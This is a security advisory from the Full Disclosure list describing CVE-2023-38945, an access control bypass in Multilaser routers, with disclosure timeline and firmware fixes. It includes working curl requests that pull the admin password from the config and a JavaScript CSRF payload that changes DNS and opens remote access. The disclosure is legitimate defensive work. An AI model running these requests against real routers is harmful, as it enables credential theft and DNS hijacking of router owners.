From: Vinícius Moraes <vinicius.moraes.w () gmail com>
Date: Wed, 28 Feb 2024 16:12:56 -0300
=====[Tempest Security Intelligence - Security Advisory -
CVE-2023-38945]=======
Access Control Bypass in Multilaser routers' Web Management Interface
Author: Vinicius Moraes < vinicius.moraes.w () gmail com >
=====[Table of
Contents]========================================================
1. Overview
2. Detailed description
3. Other contexts & solutions
4. Acknowledgements
5. Timeline
6. References
=====[1.
Overview]==============================================================
* Systems affected: Multilaser RE160 web interface -
V5.07.51_pt_MTL01(verified)
-
V5.07.52_pt_MTL01(verified)
(other routers/versions may be
affected)
Multilaser RE160V web interface - V12.03.01.08_pt
(verified)
- V12.03.01.09_pt
(verified)
(other routers/versions may be
affected)
Multilaser RE163V web interface - V12.03.01.08_pt
(verified)
(other routers/versions may be
affected)
* Release date: 28/02/2024
* CVSS score: 7.7 / High
* CVSS vector:
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
* Impact: This vulnerability allows attackers to bypass the access control
of
the routers' web interface and perform management actions, such as
changing the DNS settings, enabling router remote access,
changing the
IP routing table, and retrieving the WiFi and management
application
passwords. A noteworthy aspect also regards the fact that the
attack
can be conducted remotely.
=====[2. Detailed
description]==================================================
The affected Multilaser routers have a web management interface designed to
graphically assist users in configuring features and diagnosing problems.
However, there is a bug in its access control mechanism that allows
unauthenticated users to access routers' management features.
In order to exploit this bug, it is necessary to add a specific extension
at the
end of the URLs. Some acceptable extension values are: js, css, png, jpg,
gif,
jsp. The following example shows how an unauthenticated user (not bearing a
credential or session token) could perform it by using the curl tool[1] to
retrieve, for example, a backup of the RE160 router config, which contains
its
web interface password:
[snippet]
$ # traditional unauthenticated request being redirected to the login page
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E
'HTTP/|Locatio'
HTTP/1.0 302 Redirect
Location: http://[routerIpAddress]/login.asp
$
$ # malicious unauthenticated request getting the web interface password
$ # (in this example: "pass123")
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E
'HTTP/|http_pass'
HTTP/1.0 200 OK
http_passwd=pass123
[/snippet]
Furthermore, the next example presents part of a JavaScript code that could
be
added to a malicious website with the purpose of changing the router's DNS
address and enabling remote access on vulnerable RE160V and RE163V routers.
This can be achieved by exploiting this access control issue and a CSRF[3]:
[code]
fetch('http://[routerIpAddress]/goform/setSysTools/.js', {
'method': 'POST',
'mode': 'no-cors',
'headers': {
'Content-Type': 'application/x-www-form-urlencoded'
},
'body':
'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&
module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'
})
[/code]
By performing the aforementioned steps, an attacker can gain access to all
features of the web interface.
This vulnerability can be exploited remotely via a malicious website or a
mobile/desktop application performing HTTP requests against the router. And
also locally, by connecting to a vulnerable router (such as through the
wireless
infrastructure of a coffee shop or airport).
=====[3. Other contexts &
solutions]============================================
Conceptually, in order to fix this issue, the server receiving the request
must
always validate the session token in authenticated features as a
prerequisite
for enforcing access control, regardless of any extension in the URL. Upon
not
receiving a valid session token within the request, users should be
redirected
to the login page.
Practically, to mitigate this issue, the RE160V should be updated to
firmware
V12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5].
Multilaser informed that they contacted the firmware vendor of the model
RE160,
but due to the age of the equipment and its limitations, it will not
receive an
update to fix the issue. Therefore, it is recommended to replace the RE160
router with a new one that has received the fix (such as RE160V or RE163V).
=====[4.
Acknowledgements]======================================================
Joaquim Brasil de Oliveira < palulabrasil () gmail com >
< twitter.com/palulabr >
Tempest Security Intelligence[2]
=====[5.
Timeline]==============================================================
13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10)
fixed
the bug;
28/04/2023 - The bug regarding model RE160V was reported to the vendor;
29/06/2023 - A new contact was made with the company;
29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;
07/07/2023 - The same bug in model RE160 was reported to the vendor;
16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) where
the
bug was fixed;
26/10/2023 - Vendor informed that RE160 will not receive a fix;
26/10/2023 - Vendor released the RE160V update on its website[4].
=====[6.
References]============================================================
[1] https://curl.se
[2] https://tempest.com.br
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152
[4]
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v
[5]
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Multilaser Router - Access Control Bypass through URL Manipulation - CVE-2023-38945 Vinícius Moraes (Mar 02)